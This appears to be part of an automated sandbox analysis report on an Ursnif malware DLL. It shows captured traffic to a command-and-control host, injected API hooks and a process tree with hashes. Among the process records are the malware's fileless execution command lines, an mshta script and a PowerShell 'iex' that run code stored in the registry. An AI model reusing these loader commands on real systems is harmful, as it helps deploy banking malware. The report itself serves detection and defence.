Dec 16, 2020 11:07:34.077131987 CET	4926	IN	Data Raw: 65 2f 53 72 44 44 47 65 31 75 42 43 48 61 62 59 74 36 4b 34 70 49 4f 4f 78 70 4f 4b 45 71 7a 68 42 79 32 72 6c 36 4e 43 75 69 57 4e 52 2b 52 75 4e 62 37 58 39 6a 4e 4f 72 64 66 37 6b 67 4d 51 43 34 2b 70 76 49 63 6e 4b 53 46 62 6d 47 7a 46 56 2f Data Ascii: e/SrDDGe1uBCHabYt6K4pIOOxpOKEqzhBy2rl6NCuiWNR+RuNb7X9jNOrdf7kgMQC4+pvIcnKSFbmGzFV/zN66hfifALxo6r7wCQlGzfL/bpcMCH0SwLOExfGsD4lWCfNx3R/2LbCRrj+E4ZUIhWsZbW1+PFNIC7Tj97IUCs6dLgF3f9vLGbtSrQ5YReoXEa8lPVF1VDTrppbcKGEkTXj9guqOhiijDF/a0rOQ9lkaQJ9xg7rMf
Dec 16, 2020 11:07:34.077162027 CET	4927	IN	Data Raw: 76 34 78 76 41 76 4f 50 47 33 71 2b 6e 67 70 42 34 49 6b 35 39 50 77 39 56 31 59 6b 56 76 63 55 59 39 38 6f 69 44 54 32 73 77 59 6a 50 74 42 31 46 72 52 53 5a 47 32 7a 35 72 64 2b 6c 36 69 72 47 53 48 5a 58 37 47 6f 4d 36 30 35 32 78 50 66 33 56 Data Ascii: v4xvAvOPG3q+ngpB4Ik59Pw9V1YkVvcUY98oiDT2swYjPtB1FrRSZG2z5rd+l6irGSHZX7GoM6052xPf3VU54LJsP17RA7SsYC+FbVkXIxXOHn/zqXtFGd7VIOdxCfrMgvQLsWoZBt+V+i8cAqBXKMTg4byDN5yoypncX+NxUMQqM6cYwMyJwWqmvlgTt28/KGnbCrZYVS2kMeETgsPB7plSlu9zzJ0L+jWr68cpuvfN0b3wLIz
Dec 16, 2020 11:07:34.077199936 CET	4928	IN	Data Raw: 65 6d 6a 33 71 4d 4c 49 59 62 48 76 4b 46 65 59 6a 43 64 4f 6d 7a 4a 2b 62 76 79 4d 2f 43 6a 33 67 65 57 6d 77 46 58 65 33 44 68 51 2f 4b 7a 2f 71 62 78 76 4a 36 52 43 48 36 65 42 44 58 66 55 58 6d 4c 37 71 70 66 71 54 33 51 43 47 56 39 4b 49 35 Data Ascii: emj3qMLIYbHvKFeYjCdOmzJ+bvyM/Cj3geWmwFXe3DhQ/Kz/qbxvJ6RCH6eBDXfUXmL7qpfqT3QCGV9KI5JERyVykS3F/YafcCTTG4Yj8ILfYY6HvdbP1FZon9D3qXirEKQjxg0ZmqCDs/gH++mcW75FfakA6GDsjZGMas2Nbxt37LUmkSiKi9aDSsXTlITvxXgCBw346Wm+ZQFsxpExljJmt6old90kCO2Vj8vZ8kX8qnhiwQU
Dec 16, 2020 11:07:34.077222109 CET	4930	IN	Data Raw: 37 73 6d 64 42 42 4d 47 5a 50 61 42 4c 39 79 45 5a 38 6d 66 6e 36 49 68 58 44 50 59 55 69 71 69 67 66 71 77 45 4f 46 36 72 34 72 74 52 69 4a 36 68 78 6a 79 70 56 70 44 4f 53 43 31 43 53 70 67 6d 4f 50 72 2f 55 56 56 71 58 73 43 61 6e 34 49 65 54 Data Ascii: 7smdBBMGZPaBL9yEZ8mfn6IhXDPYUiqigfqwEOF6r4rtRiJ6hxjypVpDOSC1CSpgmOPr/UVVqXsCan4IeTDp1Aq5GZysw1gchGmxef5jp54EyAJ5iIoZHUfn+bt9tOB1TRWPkGa2OTF/ejdNVXyI9+8AFq/Is1wM5VvAtm6Sbl5Sp+hpSusUXTzz++nOQCtgNszmCtHuymLvPyhgr6EWVgRWxwdFuMttkq7QyXClYEIUd7YlnUo
Dec 16, 2020 11:07:34.077275991 CET	4931	IN	Data Raw: 75 55 39 31 7a 74 52 44 6a 51 2b 6f 2f 65 35 32 6e 64 46 37 41 2f 58 2b 66 5a 43 44 34 6f 67 72 58 49 69 34 36 72 38 49 42 51 56 63 75 43 78 58 54 78 51 36 48 75 43 42 32 32 33 77 78 4b 6d 4f 66 34 64 4f 33 51 4e 46 32 51 41 36 65 50 52 53 39 4f Data Ascii: uU91ztRDjQ+o/e52ndF7A/X+fZCD4ogrXIi46r8IBQVcuCxXTxQ6HuCB223wxKmOf4dO3QNF2QA6ePRS9OsJJISYQSHm5Y3Ha9jXO/oYHK8P2zDAxZI106PGc1NTAiUsgMaepv5l2Zk+B004hn7O2+ZzcqMHD+1PslXh+k6e80Dn8uCS/VKhYjkNnGxy81HSiZhjxrrHpZnfRbLmGJ74WdSNw11UImZ+NsBBC4zO0yoc+fnzfNy
Dec 16, 2020 11:07:34.077306032 CET	4933	IN	Data Raw: 4b 35 65 64 42 75 52 66 79 74 6c 66 6d 6b 62 62 48 30 6c 45 4d 76 62 37 36 59 4d 6e 49 4d 38 6d 53 45 38 44 48 31 59 53 65 45 6c 6f 79 74 46 72 63 76 42 6b 58 7a 50 4f 75 79 61 36 41 68 4d 78 58 30 42 78 51 67 58 6f 6a 63 72 45 48 34 34 50 2f 71 Data Ascii: K5edBuRfytlfmkbbH0lEMvb76YMnIM8mSE8DH1YSeEloytFrcvBkXzPOuya6AhMxX0BxQgXojcrEH44P/qdUF5s0y42Ss8OLOFFZKcjZdFRS/Cdt7F0sDvbPl/Dc4v1qlfwXa77+1aOFDWxRHOq2+MF0zK7DGS4UUH0KFA3j9EJRCj1gbd6eVzPh2IYVYe86hiGK3dTh71+so28kGTKs5fxs9/yoGJkEN4wjWmS4WYN+v++bsIt
Dec 16, 2020 11:07:34.235802889 CET	4934	IN	Data Raw: 6c 77 76 59 79 57 56 6e 68 66 38 41 74 55 53 56 4b 52 74 55 6b 62 47 62 43 2b 43 33 53 65 38 78 42 74 35 67 72 65 37 2f 41 62 6b 43 51 42 36 6b 45 72 79 73 4c 50 35 57 59 7a 73 61 78 42 38 54 69 4a 75 53 35 43 48 74 6a 4b 66 6a 67 52 52 30 6f 46 Data Ascii: lwvYyWVnhf8AtUSVKRtUkbGbC+C3Se8xBt5gre7/AbkCQB6kErysLP5WYzsaxB8TiJuS5CHtjKfjgRR0oFa+ypRCt+wYsFG2okg+9S7gaDzoonMc89cPoETN+YFi//cnjSxVKOqCi1ol6HdGRFy3cup9w0lKTg3poAR0KK1JTGKUvPvDVtidv0XfV3cy938kOEgGudqH48njW2QveoeLlzxrorQ06Vt0bAgVCKPlqVlmAEl4b4M

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49745	193.56.255.167	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Dec 16, 2020 11:07:36.692709923 CET	5235	OUT	GET /images/7fyxdgE16Wzc/NTp3KYRnq_2/FfVuj_2BgOC9g9/ypxwvUsxP_2BjRv4IoOGY/ls8cRjS9_2B9CFok/IIciaBbavff8xIv/QDnJnQxg5GFZWds3Q4/WJYPPBvIM/fTQamjd1C8ZF4x_2BQAG/7tjeWUw0l7HYY5PaqB5/4nRQ7JoUoZ1VN0XTFxi7Cj/sa195v8n0NrfN/CyTgvxQv/A6Pn.avi HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: rosadalking.xyz Connection: Keep-Alive Cookie: lang=en
Dec 16, 2020 11:07:36.878608942 CET	5237	IN	HTTP/1.1 200 OK Date: Wed, 16 Dec 2020 10:07:36 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Set-Cookie: PHPSESSID=ei8vnctk71sg1bp380ag93sn56; path=/; domain=.rosadalking.xyz Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 2404 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 2b 67 47 75 41 33 43 6a 6b 4d 6e 6c 47 4d 78 4b 47 65 61 47 67 79 43 49 4f 4d 5a 4d 2f 76 43 42 43 61 6f 42 6b 4d 73 48 57 31 6b 4b 55 63 7a 56 4c 48 5a 35 35 6e 6f 53 4a 6e 65 34 44 4b 64 71 65 31 53 78 37 42 51 58 37 52 73 57 41 39 6c 73 71 56 54 69 44 57 56 62 5a 77 32 43 37 59 55 75 52 61 35 75 6d 50 39 76 4a 6d 79 57 6b 54 2b 74 64 6e 63 34 4e 50 59 68 66 5a 51 73 57 33 54 74 73 43 4a 4f 4a 50 68 68 33 62 50 56 5a 41 72 4b 55 56 77 75 35 62 6a 78 73 6a 56 57 64 43 33 50 47 4b 77 74 46 51 62 31 73 51 6a 4f 6b 4f 45 57 4e 47 48 34 51 67 59 50 7a 53 38 71 57 32 7a 56 30 72 74 51 45 4f 74 79 4e 2b 51 45 4a 6d 58 4f 2b 72 5a 38 33 4d 6f 46 46 53 6e 6f 36 32 72 42 71 43 58 50 33 37 48 62 45 72 77 5a 4b 54 70 56 38 6c 69 33 33 34 68 54 58 39 35 71 55 68 2f 64 66 33 6c 36 47 76 53 48 49 49 30 4d 49 4f 78 50 59 6e 67 62 33 49 56 72 79 69 4f 70 64 47 48 41 31 59 4f 54 48 6d 4b 70 6e 61 6e 70 56 58 4e 44 59 54 53 46 63 51 73 70 48 72 75 4a 36 46 4b 6e 77 2f 55 33 42 38 67 45 47 41 33 79 50 6a 6f 32 52 69 38 36 49 69 4b 47 76 59 31 55 78 51 42 58 4a 61 6a 62 76 67 39 73 66 46 37 61 30 6e 61 7a 4e 6b 62 76 66 53 4e 74 42 73 56 44 5a 6c 68 79 55 46 4a 6a 4c 64 55 78 61 69 43 74 31 7a 44 5a 73 79 71 63 32 52 53 71 4a 37 61 63 79 47 6c 36 66 37 72 77 4b 48 70 57 4a 52 78 52 6d 6f 68 38 51 4c 2f 6e 2f 36 6b 65 37 6d 4b 35 78 7a 79 54 49 6f 54 36 62 30 45 32 61 6c 70 56 32 61 61 58 68 42 76 31 6d 4b 79 31 4e 77 62 6b 71 38 59 32 47 76 45 7a 52 4a 64 39 56 6d 38 38 79 72 4b 4e 38 35 43 53 61 51 43 55 42 4c 6c 70 48 48 7a 64 53 57 71 4d 41 72 4b 6a 64 72 71 33 49 35 66 43 76 57 4a 32 39 71 35 4d 30 2f 75 54 66 74 47 31 4c 2b 4f 54 6d 59 56 4e 4e 59 6e 62 73 4e 58 52 50 43 43 36 7a 2f 6b 7a 64 49 5a 52 37 6e 73 53 74 73 31 57 30 55 67 58 5a 55 30 56 72 78 75 6b 43 32 66 75 30 39 67 47 49 38 4d 70 61 32 61 68 6d 68 30 76 2f 53 78 71 66 77 57 41 76 4b 56 59 5a 51 73 50 43 78 43 76 55 77 64 4a 48 47 4d 67 74 46 73 57 30 30 6d 52 34 30 52 4b 75 37 48 43 42 51 6c 2b 50 6e 47 7a 50 75 57 62 34 42 4b 51 43 70 45 43 79 65 63 59 72 76 6b 6f 61 75 58 63 37 34 7a 57 44 30 4d 70 62 6c 66 34 48 4f 51 61 4b 2b 62 55 75 64 6e 4b 61 44 30 4d 34 64 53 2b 32 4e 46 4f 68 77 45 57 6d 31 6f 6b 46 48 4f 4d 58 6b 41 61 72 70 64 34 2f 68 78 38 6a 2f 49 56 64 69 71 58 69 50 64 42 44 47 4d 33 78 75 56 42 56 76 4b 43 72 33 6f 33 39 59 62 38 46 41 77 79 35 76 41 50 41 6a 2f 4d 6a 35 4e 78 74 57 51 54 43 68 30 77 50 55 69 67 6b 38 62 67 4b 34 73 39 41 41 34 6e 47 46 4a 72 32 6f 35 38 68 52 56 4a 5a 4b 31 6c 4c 31 4e 4b 47 72 73 38 48 5a 76 32 67 67 38 2f 6c 4b 71 79 50 36 66 6a 6b 54 6c 6c 70 38 2b 4a 63 75 78 38 49 4c 61 Data Ascii: R+gGuA3CjkMnlGMxKGeaGgyCIOMZM/vCBCaoBkMsHW1kKUczVLHZ55noSJne4DKdqe1Sx7BQX7RsWA9lsqVTiDWVbZw2C7YUuRa5umP9vJmyWkT+tdnc4NPYhfZQsW3TtsCJOJPhh3bPVZArKUVwu5bjxsjVWdC3PGKwtFQb1sQjOkOEWNGH4QgYPzS8qW2zV0rtQEOtyN+QEJmXO+rZ83MoFFSno62rBqCXP37HbErwZKTpV8li334hTX95qUh/df3l6GvSHII0MIOxPYngb3IVryiOpdGHA1YOTHmKpnanpVXNDYTSFcQspHruJ6FKnw/U3B8gEGA3yPjo2Ri86IiKGvY1UxQBXJajbvg9sfF7a0nazNkbvfSNtBsVDZlhyUFJjLdUxaiCt1zDZsyqc2RSqJ7acyGl6f7rwKHpWJRxRmoh8QL/n/6ke7mK5xzyTIoT6b0E2alpV2aaXhBv1mKy1Nwbkq8Y2GvEzRJd9Vm88yrKN85CSaQCUBLlpHHzdSWqMArKjdrq3I5fCvWJ29q5M0/uTftG1L+OTmYVNNYnbsNXRPCC6z/kzdIZR7nsSts1W0UgXZU0VrxukC2fu09gGI8Mpa2ahmh0v/SxqfwWAvKVYZQsPCxCvUwdJHGMgtFsW00mR40RKu7HCBQl+PnGzPuWb4BKQCpECyecYrvkoauXc74zWD0Mpblf4HOQaK+bUudnKaD0M4dS+2NFOhwEWm1okFHOMXkAarpd4/hx8j/IVdiqXiPdBDGM3xuVBVvKCr3o39Yb8FAwy5vAPAj/Mj5NxtWQTCh0wPUigk8bgK4s9AA4nGFJr2o58hRVJZK1lL1NKGrs8HZv2gg8/lKqyP6fjkTllp8+Jcux8ILa
Dec 16, 2020 11:07:36.878638983 CET	5238	IN	Data Raw: 65 42 6e 4a 42 6b 48 53 64 7a 6c 79 58 2b 35 70 42 49 6b 55 70 49 75 77 30 51 45 56 44 65 59 2f 4c 58 41 44 57 7a 49 71 53 47 70 58 55 5a 46 64 31 42 7a 54 6f 42 41 65 6f 36 68 79 78 45 31 75 64 67 78 6e 78 4d 46 66 4b 43 77 78 2b 4b 4d 51 41 44 Data Ascii: eBnJBkHSdzlyX+5pBIkUpIuw0QEVDeY/LXADWzIqSGpXUZFd1BzToBAeo6hyxE1udgxnxMFfKCwx+KMQADsMnRt6nBuXFC0q00kPEzHdyDOjeDEAeMB6aYvg1r5+2XRwhS+LubvNPjtuCqrExMYWJgmrZec96OYP4du/tg6J6K8VlfGQdnaE+F1q47LZaEPPWn562JThM0UoPhmF14oUyC7xO3HfSytF/FGHEp204jILFTGL/bT
Dec 16, 2020 11:07:36.878665924 CET	5238	IN	Data Raw: 6b 41 63 6d 30 71 4e 39 4d 30 47 52 74 70 32 31 53 2b 45 30 67 36 35 77 66 64 54 75 61 50 7a 42 58 55 57 4b 43 69 2b 4a 70 42 38 5a 6f 6d 6a 39 39 7a 61 71 54 35 6e 65 58 38 55 35 53 53 67 52 35 4a 6b 50 56 59 56 4e 42 43 52 35 38 57 7a 72 74 56 Data Ascii: kAcm0qN9M0GRtp21S+E0g65wfdTuaPzBXUWKCi+JpB8Zomj99zaqT5neX8U5SSgR5JkPVYVNBCR58WzrtVzE2U2pWWQawbvgWgf9IJLFuNem7xfB3b27RMTXTf4+D2NkXvgOACd08pnnYMs3SPZ009ltqEKwSGAihKUrOLwoxdguLmGJgtRcfAuAY1Yg==

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Dec 16, 2020 11:09:21.197544098 CET	216.58.210.2	443	192.168.2.5	49761	CN=*.g.doubleclick.net, O=Google LLC, L=Mountain View, ST=California, C=US CN=GTS CA 1O1, O=Google Trust Services, C=US	CN=GTS CA 1O1, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2	Tue Nov 10 15:34:37 CET 2020 Thu Jun 15 02:00:42 CEST 2017	Tue Feb 02 15:34:36 CET 2021 Wed Dec 15 01:00:42 CET 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-24-65281,29-23-24,0	57f3642b4e37e28f5cbe3020c9331b4c
Dec 16, 2020 11:09:21.197544098 CET	216.58.210.2	443	192.168.2.5	49761	CN=GTS CA 1O1, O=Google Trust Services, C=US	CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2	Thu Jun 15 02:00:42 CEST 2017	Wed Dec 15 01:00:42 CET 2021		57f3642b4e37e28f5cbe3020c9331b4c
Dec 16, 2020 11:09:31.327621937 CET	185.156.172.54	443	192.168.2.5	49762	CN=*, OU=1, O=1, L=1, ST=1, C=XX	CN=*, OU=1, O=1, L=1, ST=1, C=XX	Thu Dec 03 22:14:50 CET 2020	Sun Dec 01 22:14:50 CET 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,10-11-13-35-23-24-65281,29-23-24,0	7dd50e112cd23734a310b90f6f44a7cd

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	explorer.exe
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	explorer.exe
CreateProcessAsUserW	EAT	explorer.exe
CreateProcessAsUserW	INLINE	explorer.exe
CreateProcessW	EAT	explorer.exe
CreateProcessW	INLINE	explorer.exe
CreateProcessA	EAT	explorer.exe
CreateProcessA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: WININET.dll

Function Name	Hook Type	New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	7FFA9B335200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	3B7152C

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	7FFA9B335200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	3B7152C

Process: explorer.exe, Module: KERNEL32.DLL

Function Name	Hook Type	New Data
CreateProcessAsUserW	EAT	7FFA9B33521C
CreateProcessAsUserW	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessW	EAT	7FFA9B335200
CreateProcessW	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessA	EAT	7FFA9B33520E
CreateProcessA	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 5508 Parent PID: 5764

General

Start time:	11:06:22
Start date:	16/12/2020
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\5fd9d7ec9e7aetar.dll'
Imagebase:	0x13d0000
File size:	120832 bytes
MD5 hash:	2D39D4DFDE8F7151723794029AB8A034
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.239593873.0000000003AA8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.239746568.0000000003AA8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.239727168.0000000003AA8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.381854498.00000000038AC000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.456980641.0000000001240000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.239703401.0000000003AA8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.239555043.0000000003AA8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.438096785.0000000001270000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.239627007.0000000003AA8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.239757278.0000000003AA8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.239668974.0000000003AA8000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: iexplore.exe PID: 6276 Parent PID: 792

General

Start time:	11:06:26
Start date:	16/12/2020
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff637690000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6324 Parent PID: 6276

General

Start time:	11:06:26
Start date:	16/12/2020
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6276 CREDAT:17410 /prefetch:2
Imagebase:	0xb70000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 3880 Parent PID: 792

General

Start time:	11:07:29
Start date:	16/12/2020
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff637690000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 2588 Parent PID: 3880

General

Start time:	11:07:29
Start date:	16/12/2020
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3880 CREDAT:17410 /prefetch:2
Imagebase:	0xb70000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 4380 Parent PID: 3880

General

Start time:	11:07:32
Start date:	16/12/2020
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3880 CREDAT:17418 /prefetch:2
Imagebase:	0xb70000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6308 Parent PID: 3880

General

Start time:	11:07:35
Start date:	16/12/2020
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3880 CREDAT:17428 /prefetch:2
Imagebase:	0xb70000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: mshta.exe PID: 5092 Parent PID: 3472

General

Start time:	11:07:41
Start date:	16/12/2020
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'
Imagebase:	0x7ff6dd860000
File size:	14848 bytes
MD5 hash:	197FC97C6A843BEBB445C1D9C58DCBDB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: powershell.exe PID: 6620 Parent PID: 5092

General

Start time:	11:07:43
Start date:	16/12/2020
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Imagebase:	0x7ff617cb0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001C.00000003.435428335.00000224A90B0000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 1700 Parent PID: 6620

General

Start time:	11:07:43
Start date:	16/12/2020
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: csc.exe PID: 6180 Parent PID: 6620

General

Start time:	11:07:51
Start date:	16/12/2020
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lcbc4odh\lcbc4odh.cmdline'
Imagebase:	0x7ff7f2da0000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Chronological Activities

Analysis Process: cvtres.exe PID: 1396 Parent PID: 6180

General

Start time:	11:07:52
Start date:	16/12/2020
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9CA2.tmp' 'c:\Users\user\AppData\Local\Temp\lcbc4odh\CSCECDBA1D9933D457DB056F31AC2CEEADE.TMP'
Imagebase:	0x7ff76a190000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: csc.exe PID: 5044 Parent PID: 6620

General

Start time:	11:07:55
Start date:	16/12/2020
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\00wddsye\00wddsye.cmdline'
Imagebase:	0x7ff7f2da0000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Chronological Activities

Analysis Process: cvtres.exe PID: 5136 Parent PID: 5044

General

Start time:	11:07:56
Start date:	16/12/2020
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESABD5.tmp' 'c:\Users\user\AppData\Local\Temp\00wddsye\CSCFFAD43D2FB2747A5BC1271AB7CCA8A12.TMP'
Imagebase:	0x7ff76a190000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: explorer.exe PID: 3472 Parent PID: 6620

General

Start time:	11:08:01
Start date:	16/12/2020
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff693d90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000003.454780333.0000000003070000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000002.641874278.0000000003B86000.00000004.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: control.exe PID: 5128 Parent PID: 5508

General

Start time:	11:08:01
Start date:	16/12/2020
Path:	C:\Windows\System32\control.exe
Wow64 process (32bit):	false
